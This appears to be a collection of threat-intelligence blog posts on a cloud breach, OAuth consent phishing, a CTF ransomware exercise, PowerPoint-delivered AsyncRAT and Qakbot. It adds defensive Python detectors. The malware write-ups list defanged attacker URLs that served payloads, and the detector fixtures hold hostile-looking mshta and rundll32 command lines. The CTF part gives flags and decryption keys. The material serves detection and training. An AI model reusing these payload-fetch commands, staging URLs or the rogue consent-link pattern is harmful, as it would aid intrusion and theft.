Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to meet their hosting needs, but outsourcing workloads should not imply outsourcing security as well. The importance of securing the cloud was recently highlighted by the targeting of Microsoft Azure environments by Nobelium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from the likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Services (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Log availability was an issue due to the lack of CloudTrail log retention, but we know that the threat actor created multiple IAM user accounts and accessed internal data, including data stored in S3 buckets, via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping-off point to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2 instances in the compromised environment to scan and exploit external IP addresses, using t2.micro instance sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than the one used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access an FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a hard-coded credential found in one of the configuration files in the victim’s BitBucket repository, which is also suspected to have been compromised. After thorough enumeration of the environment and its users, the attacker was able to obtain the password for another G Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing GCP, the threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, along with the backup copies. Fortunately, AWS had retained some copies of the deleted backups, which it was able to provide to the victim organisation.

However, while the victim restored their AWS systems, they did not reset the root access key. Unsurprisingly, the attacker quickly re-established a presence in their cloud, and a few days later they deleted the production environment again, although no ransom demand was recorded. This was when our incident response team was called in to help.

Assessment

Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still cause significant operational damage to a large company by deleting its production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this is not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help identify suspicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against MITRE ATT&CK tactics that we recommend organisations implement in AWS Config, Lambda, or their CSPM platform of choice for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

Tactic | Technique (custom) | Log Source
Initial Access | AWS user login failed multiple times | CloudTrail
Initial Access | Multiple worldwide successful console logins | GuardDuty
Initial Access | Potential web scanning activity: multiple web server 400 errors from the same source IP | Web access log
Privilege Escalation | AWS “AssumeRole” from rare external AWS account | CloudTrail
Discovery | AWS potential IAM enumeration activities | CloudTrail
Defense Evasion / Persistence | Create/update managed policy with excessive permissions | CloudTrail
Impact | AWS access key enabled | CloudTrail
Exfiltration | Egress rule added to a security group | CloudTrail
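As an added example (not DarkLab’s ruleset), the following Python detector replays constructed CloudTrail records and applies four of the checks described above: repeated failed console logins, AssumeRole from an account outside the organisation, EC2 instances launched in a region the organisation does not use, and IAM user and access-key creation by the root account. The account ids, region names, user names and IP addresses are invented sample values.

```python
import json
from collections import Counter

OWN_ACCOUNT = "111111111111"   # assumption: the organisation's own AWS account id
HOME_REGIONS = {"ap-east-1"}   # assumption: the only region it normally deploys to
FAILED_LOGIN_THRESHOLD = 3


def _ev(name, source, region, ident, ip, **extra):
    """Build one constructed CloudTrail record, trimmed to the fields the checks use."""
    rec = {"eventName": name, "eventSource": source, "awsRegion": region,
           "userIdentity": ident, "sourceIPAddress": ip}
    rec.update(extra)
    return json.dumps(rec)


IAM_USER = {"type": "IAMUser", "userName": "alice", "accountId": OWN_ACCOUNT}
ROOT = {"type": "Root", "accountId": OWN_ACCOUNT}
EXTERNAL = {"type": "AWSAccount", "accountId": "999999999999"}  # constructed foreign account

# Constructed sample trail: three failed console logins, then activity resembling the
# incident (external AssumeRole, t2.micro launched in a foreign region, root creating
# an IAM user and access key), followed by one benign launch in the home region.
SAMPLE_EVENTS = [
    *[_ev("ConsoleLogin", "signin.amazonaws.com", "us-east-1", IAM_USER, "203.0.113.7",
          responseElements={"ConsoleLogin": "Failure"}) for _ in range(3)],
    _ev("AssumeRole", "sts.amazonaws.com", "ap-east-1", EXTERNAL, "198.51.100.9",
        requestParameters={"roleArn": f"arn:aws:iam::{OWN_ACCOUNT}:role/Admin"}),
    _ev("RunInstances", "ec2.amazonaws.com", "us-west-2", ROOT, "198.51.100.9",
        requestParameters={"instanceType": "t2.micro"}),
    _ev("CreateUser", "iam.amazonaws.com", "us-east-1", ROOT, "198.51.100.9",
        requestParameters={"userName": "backup-svc"}),
    _ev("CreateAccessKey", "iam.amazonaws.com", "us-east-1", ROOT, "198.51.100.9",
        requestParameters={"userName": "backup-svc"}),
    _ev("RunInstances", "ec2.amazonaws.com", "ap-east-1", IAM_USER, "203.0.113.7",
        requestParameters={"instanceType": "m5.large"}),
]


def detect(lines, own_account=OWN_ACCOUNT, home_regions=HOME_REGIONS):
    """Return (tactic, technique, detail) tuples for a list of CloudTrail JSON lines."""
    findings = []
    failed = Counter()
    for line in lines:
        e = json.loads(line)
        ident = e.get("userIdentity", {})
        name = e.get("eventName")
        params = e.get("requestParameters", {})
        if name == "ConsoleLogin" and e.get("responseElements", {}).get("ConsoleLogin") == "Failure":
            # Count failures per (user, source IP); reported once the threshold is reached
            failed[(ident.get("userName"), e.get("sourceIPAddress"))] += 1
        elif name == "AssumeRole" and ident.get("accountId") not in (None, own_account):
            findings.append(("Privilege Escalation", "AssumeRole from external AWS account",
                             f"account {ident['accountId']} -> {params.get('roleArn')}"))
        elif name == "RunInstances" and e.get("awsRegion") not in home_regions:
            # The attacker above launched instances in a region the victim never used
            findings.append(("Execution", "EC2 instance launched outside home regions",
                             f"{e['awsRegion']} {params.get('instanceType')}"))
        elif ident.get("type") == "Root" and name in ("CreateUser", "CreateAccessKey"):
            # Root should not be used day to day; new principals created by it are suspect
            findings.append(("Persistence", f"root account {name}", params.get("userName", "")))
    for (user, ip), n in failed.items():
        if n >= FAILED_LOGIN_THRESHOLD:
            findings.append(("Initial Access", "AWS user login failed multiple times",
                             f"{user} from {ip} x{n}"))
    return findings


if __name__ == "__main__":
    for tactic, technique, detail in detect(SAMPLE_EVENTS):
        print(f"[{tactic}] {technique}: {detail}")
```

In production the same function body can run inside a Lambda subscribed to the CloudTrail log group, with the home-region and account values taken from configuration.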

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that the threat actors leveraged the OAuth2 framework to gain permissions to the victim’s O365 account through a rogue Azure application. This would have allowed them to bypass multi-factor authentication controls and directly access the victim’s account with a stolen OAuth token, making this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email is sent from a domain of a separate entity, likely compromised by the threat actor before initiating the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP FROM header.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on the threat actors’ intent, the permissions requested can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx &redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource= https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx #efe1b61bcf8df6b76595xxxxxxxxxxxx

The URL above represents an access request to the Microsoft identity platform asking for an authorization code, denoted by the response_type field. The client_id field denotes the unique ID of an Azure application owned by the threat actor, and the redirect_uri field points to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request once the victim grants the access permission.
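As an added example (not code from the original post), the following Python helper parses an authorize link of the shape shown above, as a mail gateway or analyst tool might, and flags the properties that made this one suspicious: a redirect_uri outside the organisation’s approved domains and a client secret embedded in a user-facing URL. The sample link is a constructed copy of the structure above with placeholder ids; the approved-domain list is an assumption.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts that your organisation's own or vetted apps redirect to.
APPROVED_REDIRECT_DOMAINS = {"login.microsoftonline.com", "example.com"}
# Microsoft authorize endpoints (v1 on login.windows.net, v1/v2 on login.microsoftonline.com).
MS_AUTHORIZE_HOSTS = {"login.windows.net", "login.microsoftonline.com"}

# Constructed link mirroring the phishing URL's structure; ids are placeholders.
SAMPLE_LINK = ("hxxps://login.windows.net/common/oauth2/authorize?response_type=code"
               "&client_id=00000000-0000-0000-0000-000000000001"
               "&client_secret=PLACEHOLDER-SECRET"
               "&redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online"
               "&resource=https%3A%2F%2Fkp3jccawgk[.]online&state=abc123")


def refang(link):
    """Undo the usual defanging (hxxp, [.]) so the URL parser can read the link."""
    return link.replace("hxxp", "http").replace("[.]", ".")


def triage_oauth_link(link, approved=APPROVED_REDIRECT_DOMAINS):
    """Describe an OAuth authorize link and list the reasons it looks like consent phishing."""
    url = urlsplit(refang(link))
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    result = {"is_consent_request": False, "client_id": query.get("client_id"),
              "redirect_host": None, "redirect_approved": False, "reasons": []}
    # Only links to a Microsoft authorize endpoint are OAuth consent requests.
    if url.hostname not in MS_AUTHORIZE_HOSTS or not url.path.rstrip("/").endswith("authorize"):
        return result
    result["is_consent_request"] = True
    redirect = urlsplit(query.get("redirect_uri", ""))
    result["redirect_host"] = redirect.hostname
    result["redirect_approved"] = redirect.hostname in approved
    if not result["redirect_approved"]:
        # The authorization code will be delivered to whoever controls this host.
        result["reasons"].append(f"redirect_uri points to unapproved host {redirect.hostname}")
    if "client_secret" in query:
        # A confidential client's secret never belongs in a link sent to end users.
        result["reasons"].append("client_secret embedded in a user-facing URL")
    if query.get("response_type") == "code" and not query.get("scope"):
        # v1 endpoint: permissions come from the app registration, invisible in the link.
        result["reasons"].append("no scope in link; granted permissions set by the rogue app")
    return result


if __name__ == "__main__":
    for reason in triage_oauth_link(SAMPLE_LINK)["reasons"]:
        print("-", reason)
```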

To create such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant and host a website to capture the redirected requests and authorization codes. The redirect site also contains JavaScript snippets that detect the accessing IP address and details of the victim organisation, very likely for profiling victims and filtering out accesses from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

The threat actors would then use the rogue application to exchange the authorization code for a valid access token. They could then access the victim’s O365 account with the permissions granted during the phishing process and perform a variety of actions, from reading account information to sending emails on behalf of the victim.

This attack aims at stealing access tokens in the form of OAuth tokens. This gives direct access to a victim’s account and removes the need to steal valid user credentials or defeat multi-factor authentication.

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we were able to identify multiple threat actor domains, suggesting that they are very likely targeting banks, asset managers, equity firms, and to a lesser degree law firms and consultancies around the world, including in Hong Kong. According to domain registration data, the campaign started at the end of February and is currently active. Based on the nature of its targeting, the campaign appears to be financially motivated.

Detection and remediation

The most effective way to detect malicious behaviour linked to a user falling victim to a similar phishing email is to monitor Azure audit logs for “Consent to application” events. These represent users’ approval to grant permissions to third-party applications. Microsoft Cloud App Security is also a good place to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

In the event that an internal user falls victim and consent is given to a rogue application, IT teams can manually revoke the granted access under the “Enterprise applications” section of the Microsoft Azure portal, and should ensure that the user’s credentials are reset and protected by MFA. As a preventive measure, IT teams are also recommended to use the Azure AD admin consent workflow to require administrator involvement before user data is exposed to this kind of attack.
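As an added example (not code from the original post), this Python snippet triages “Consent to application” audit events of the kind shown in the sample log above. The records are constructed approximations of the Microsoft Graph directoryAudit shape (activityDisplayName, initiatedBy, targetResources with modifiedProperties); the approved-app list, the high-risk permission set and all ids and user names are assumptions.

```python
import re

APPROVED_APP_IDS = {"11111111-1111-1111-1111-111111111111"}   # assumption: vetted apps
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "Files.Read.All",
                    "Files.ReadWrite.All", "offline_access"}    # assumption: your risk list


def _consent_event(upn, app_name, app_id, scopes, admin=False):
    """Constructed record approximating the directoryAudit shape of a consent event."""
    return {
        "activityDisplayName": "Consent to application",
        "category": "ApplicationManagement",
        "result": "success",
        "initiatedBy": {"user": {"userPrincipalName": upn}},
        "targetResources": [{
            "displayName": app_name, "id": app_id, "type": "ServicePrincipal",
            "modifiedProperties": [
                {"displayName": "ConsentContext.IsAdminConsent",
                 "newValue": '"True"' if admin else '"False"'},
                {"displayName": "ConsentAction.Permissions",
                 "newValue": "[] => [[ConsentType: Principal, Scope: " + " ".join(scopes) + "]]"},
            ],
        }],
    }


# Constructed audit trail: a user consenting to an unknown "Review and sign" app with
# mailbox and file permissions, an admin consenting to a vetted app, and an unrelated event.
SAMPLE_AUDIT = [
    _consent_event("victim@example.com", "Review and sign", "00000000-0000-0000-0000-000000000001",
                   ["openid", "profile", "offline_access", "Mail.Read", "Files.ReadWrite.All"]),
    _consent_event("admin@example.com", "Approved CRM", "11111111-1111-1111-1111-111111111111",
                   ["User.Read"], admin=True),
    {"activityDisplayName": "Update user", "category": "UserManagement", "result": "success",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}}, "targetResources": []},
]


def triage_consents(events, approved=APPROVED_APP_IDS):
    """Return one finding per consent granted to an application outside the approved set."""
    findings = []
    for e in events:
        if e.get("activityDisplayName") != "Consent to application" or not e.get("targetResources"):
            continue
        target = e["targetResources"][0]
        if target.get("id") in approved:
            continue
        props = {p["displayName"]: p.get("newValue", "") for p in target.get("modifiedProperties", [])}
        # Property values are JSON-quoted strings in the audit log, hence the strip.
        admin = props.get("ConsentContext.IsAdminConsent", "").strip('"').lower() == "true"
        m = re.search(r"Scope:\s*([^\]]+)", props.get("ConsentAction.Permissions", ""))
        scopes = set(m.group(1).split()) if m else set()
        risky = sorted(scopes & HIGH_RISK_SCOPES)
        findings.append({
            "user": e.get("initiatedBy", {}).get("user", {}).get("userPrincipalName"),
            "app": target.get("displayName"), "app_id": target.get("id"),
            "admin_consent": admin, "risky_scopes": risky,
            # User-granted consent to an unknown app with mailbox/file access is the pattern above.
            "severity": "high" if risky and not admin else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in triage_consents(SAMPLE_AUDIT):
        print(f"{f['severity'].upper()}: {f['user']} consented to {f['app']} ({f['app_id']}) "
              f"with {', '.join(f['risky_scopes']) or 'no high-risk'} permissions")
```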

Indicators of compromise


Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture-the-flag cybersecurity competition designed for undergraduate students, aiming to raise the competency level of future talent and better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Securing the Basics”, based on the experience and real-life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists on decrypting the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only a snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com, where X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user’s desktop, the following are found:

  • A ransomware-affected file with the extension HKADYYY
  • The ransom note HKADYYY-README, containing a flag

hackaday{y0u_hAve_b33n_R@ns0meD!}

Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the Windows event logs, we notice a suspicious code snippet under PowerShell: a large base64 payload (PowerShell with the -e option).

The following two values are found by decoding the base64:

  • Caller script: . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag

hackaday{wHo$_G0T_my_r@r1Sonn?!}

Ransomware Attack Again 3 (50 pts, 2 solves)

Description: Sometimes there is public research on the ransomware’s behaviour which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link: https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag: hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values:

  • IV: given by the base64 string located in the loader: MTIzNDU2Nzg5MDEyMzQ1Ng==
  • Key-seed: a random two-digit number followed by the SID (obtained by checking the user that executed the ransomware, i.e. sysadmin), so the candidates range from

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code is implemented with the IV and the key derived from the seed (the two-digit prefix is 99):

# IV from the loader and the key recovered from the key-seed search, both base64-encoded
$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
# AES-256 in CBC mode with zero padding, as in the published decryption routine
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key)
$decryptor = $aesManaged.CreateDecryptor()
# Read the encrypted file, decrypt it in one pass and overwrite it with the plaintext
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$bytes = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[System.IO.File]::WriteAllBytes($fileToDecrypt, $unencryptedData)
# Strip the 8-character ".HKADYYY" suffix to restore the original file name
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8)))
$decryptor.Dispose()
$aesManaged.Dispose()

Using the routine to decrypt the file reveals the final flag:

hackaday{fr33d!fin@l1y~}

That’s it for this blog series. We hope you enjoyed reading, and we look forward to seeing you at Hackaday 2021!

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC using unusual tactics, techniques and procedures (TTPs). While most phishing we observe carries MS Word or Excel attachments, this one used malicious PowerPoint (.ppt) files to eventually deploy the AsyncRAT malware and a bitcoin stealer.

Exploitation of PowerPoint attachments is not entirely new. However, it remains uncommon enough to increase the chances that unaware users will open the malicious attachments.

This phishing campaign, likely still active, appears to be focused on Asia, particularly China, although we also found samples uploaded to a popular multi-vendor AV scanner from countries in Europe. Most of the titles of the malicious documents are generic. However, the use of titles such as “Hotel Doc” for some of the lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters, as used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5: 8311c59ef727826c4b54e182a956e312], which contains malicious, obfuscated macros. The macro only executes when the file is closed by the user, in a likely attempt to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro leverages the legitimate binary mshta.exe to connect to a hardcoded URL masked with the j.mp URL shortening service. The hardcoded URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

j.mp is an alternate domain of the better-known bit.ly shortening service. According to bitly’s statistics, the malicious URL discovered was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a server used by the threat actor to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to that in a second.

Pivoting on the identified staging server revealed a significant amount of additional attack infrastructure, with a new URL for each phishing document. These URLs were all hidden behind the same j.mp shortening service and hosted on Blogspot infrastructure.

By checking the URLs’ creation dates on bitly we were able to build a timeline of the malicious campaign, which shows that the threat actor behind it has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up

Payloads

In terms of payload, we could only examine one malicious URL [Tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html] and found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, accessing it with MSHTA triggers a number of JavaScript payloads embedded in the website on the victim’s endpoint.

The first script executes a set of VBScripts that fetch the content of the following link:

hxxps://ia801408.us.archive[.]org/25/items/defender_202103/defender[.]txt

The file is deobfuscated and dropped to %Public%\bin.vbs before execution; it aims at disabling security controls ahead of the subsequent malware executions.

Fig 4 – First script disables system’s security settings

The second script reaches out to the following URL, again with MSHTA: mylundisfarbigthenyouthink.blogspot.com/p/42.html

It contains three additional payloads to disable security defences and hide the attacker’s windows, concealing the malicious activity.

Then, an additional PowerShell script is executed, loaded from one of two additional sites depending on the system architecture:

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/1[.]txt

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/2[.]txt

The payload reflectively loads two additional samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and an open source RAT called AsyncRAT [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRAT is able to send and receive commands, record keystrokes and screenshots, and upload/download files via SFTP, among other functions.

The threat actors also try to steal victims’ cryptocurrency by replacing the legitimate wallet address with one controlled by the attackers. This is done via the PowerShell script shown below, which looks for BTC wallet addresses in the clipboard and replaces them with the attacker’s address. Our research into the attacker’s BTC address shows that it had two small transactions, suggesting the attacker has so far had only limited success.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the stager domain attempts to terminate instances of excel.exe and winword.exe in an attempt to hide the attacker’s tracks.

Conclusion

The attacker’s use of open source malware and abuse of freely available Blogspot URLs as malicious infrastructure highlights the ever-lower barrier of entry for cybercriminal operations in Asia. Despite the relatively low level of technical sophistication of this threat, the use of malicious PowerPoint attachments shows some innovation in their social engineering tactics. Overall, this campaign shows how even low-cost but multi-stage cybercriminal campaigns can pose a threat to organisations by leveraging unusual social engineering techniques and open source tools.

Indicators of Compromise


Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong targeted with malicious phishing emails aimed at delivering the Qakbot malware, also referred to as Quakbot or Qbot. While the Qakbot payload is well researched in open source, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access brokers, the cybercriminals behind Qakbot have increased their operational tempo and are actively targeting Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly due to Qakbot’s links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but has since 2019 been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from likely compromised third party companies. These previous victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The emails’ subjects and text suggest the threat actors have hijacked existing email threads to add a layer of credibility to their phishing lures. In one case, a phishing email to a large company in the real estate sector referred to an existing high-profile event that the target organises each year, suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

In other phishing emails, like one sent to a retail organisation (see below), the threat actors attempted to spoof the sender to make the message look like it was coming from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign template and requires user interaction to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50], which executes macros that serve as a dropper. The dropper contacts one of five command and control (C2) URLs in an attempt to download the same file, in this case called 55555555555.jpg, a DLL containing the second stage of the malware. Other droppers we analysed showed similar behaviour despite using different stager servers and DLL names.

We also found numerous documents similar to the one we analysed, reinforcing how this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro eventually starts the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] via rundll32.exe, a technique used by threat actors to proxy the execution of malicious code through a legitimate binary while avoiding detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process
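The two execution patterns described in these posts (an Office macro spawning mshta.exe to fetch a remote page, and Excel spawning rundll32.exe to run a DLL downloaded under a .jpg name) can be caught from process-creation telemetry alone. The following Python detector is an added example, not DarkLab’s tooling, run over constructed Sysmon-style records; the short link, export name and file paths are placeholders, and the allowed module extensions are an assumption to tune per environment.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
ALLOWED_MODULE_EXT = (".dll", ".cpl")   # assumption: legitimate rundll32 module types here

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# First argument after rundll32[.exe], up to a comma (the export separator) or whitespace
RUNDLL_MODULE_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",\s]+)', re.IGNORECASE)

# Constructed process-creation records (parent image, image, command line).
SAMPLE_PROCESSES = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://j.mp/xxxxxxx"},                      # PowerPoint macro pattern
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\55555555555.jpg,DllRegisterServer"},  # Qakbot pattern
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},              # benign
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"},  # benign print helper
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_process(rec):
    """Return the list of reasons this process-creation record looks suspicious."""
    parent, image, cmd = basename(rec["parent"]), basename(rec["image"]), rec["cmdline"]
    reasons = []
    office_parent = parent in OFFICE_PARENTS
    if image == "mshta.exe":
        m = URL_RE.search(cmd)
        if m:
            reasons.append(f"mshta fetching remote content: {m.group(0)}")
        if office_parent:
            reasons.append(f"mshta spawned by Office process {parent}")
    elif image == "rundll32.exe":
        m = RUNDLL_MODULE_RE.search(cmd)
        module = m.group(1) if m else ""
        if module and not module.lower().endswith(ALLOWED_MODULE_EXT):
            # A DLL staged as 55555555555.jpg still loads fine; the extension is the tell.
            reasons.append(f"rundll32 loading module without a DLL extension: {module}")
        if office_parent:
            reasons.append(f"rundll32 spawned by Office process {parent}")
    return reasons


def detect_suspicious(records):
    """Return (image name, reasons) for every record with at least one reason."""
    out = []
    for rec in records:
        reasons = analyse_process(rec)
        if reasons:
            out.append((basename(rec["image"]), reasons))
    return out


if __name__ == "__main__":
    for image, reasons in detect_suspicious(SAMPLE_PROCESSES):
        print(image, "->", "; ".join(reasons))
```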

This specific campaign is linked to one of Qakbot’s botnets, called abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often run several botnets to ensure resilience against law enforcement action and to deliver malware to a wider range of targets.

Conclusion

Despite the successful law enforcement action in January against Emotet, one of the largest spam botnets, our findings suggest that other botnets are ready to step into the gap it left.

Operations like Qakbot show how phishing will remain a significant threat for companies in Hong Kong, as threat actors use similar malware to obtain an initial foothold in companies’ networks and to deploy further malware, like human-operated ransomware.

